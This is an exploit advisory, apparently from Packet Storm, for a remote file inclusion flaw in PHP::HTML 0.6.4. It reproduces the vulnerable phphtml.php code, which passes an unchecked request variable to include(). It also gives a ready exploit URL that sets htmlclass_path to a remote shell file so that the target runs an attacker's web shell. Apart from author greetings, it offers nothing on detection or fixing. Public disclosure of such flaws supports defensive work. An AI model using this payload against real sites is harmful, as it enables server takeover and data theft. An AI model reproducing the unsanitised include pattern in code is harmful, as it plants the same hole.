PHP::HTML version 0.6.4 suffers from a remote file inclusion vulnerability in phphtml.php.
bc5775c33dc42ad7966b0eac2926ab62d2be3de0be562f4f6544aa6739c9fa62phphtml
v 0.6.4
FOUND BY : o0xxdark0o
Website: http://www.sitellite.org/
DOWNLOAD : http://sourceforge.net/projects/phphtml
REMOTE FILE INCLUDE
############################################################
FILE :
PATH\phphtml.php
############################################################
EXP:
xxx.com\path\phphtml.php?htmlclass_path=SH3ll.txt?
############################################################
CODE: on line 19
<?
define (PHPHTML_VERSION, "0.6.4");
/* gettext is not implemented for now*/
$use_gettext=0;
/* We need to know where the PHP::HTML tree is installed.*/
if (strlen(chop($htmlclass_path))==0) $htmlclass_path=".";
if ($use_gettext==1)
{
if (function_exists("gettext"))
{
$gettext_enable=1;
}
}
include("$htmlclass_path/ext.php"); /* Some extenstions to PHP */
include("$htmlclass_path/core.php"); /* PHP::HTML Core */
include("$htmlclass_path/xhtml.php"); /* XHTML extensions */
include("$htmlclass_path/xhtml_table.php"); /* XHTML tables extensions */
include("$htmlclass_path/xhtml_forms.php"); /* XHTML forms extensions */
include("$htmlclass_path/xhtml_doc.php"); /* XHTML document extension */
include("$htmlclass_path/wml.php"); /* WML extension */
/* Below is a debugging example */
/*
$t=new XHTML_doc("Hello");
echo $t->render();
*/
############################################################
thanks for all my friends.. str0ke .... oxdo .... cold z3ro
www.hach-teach.org - www.3asfh.com
############################################################
BY : o0xxdark0o
o0xxdark0o@msn.com
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed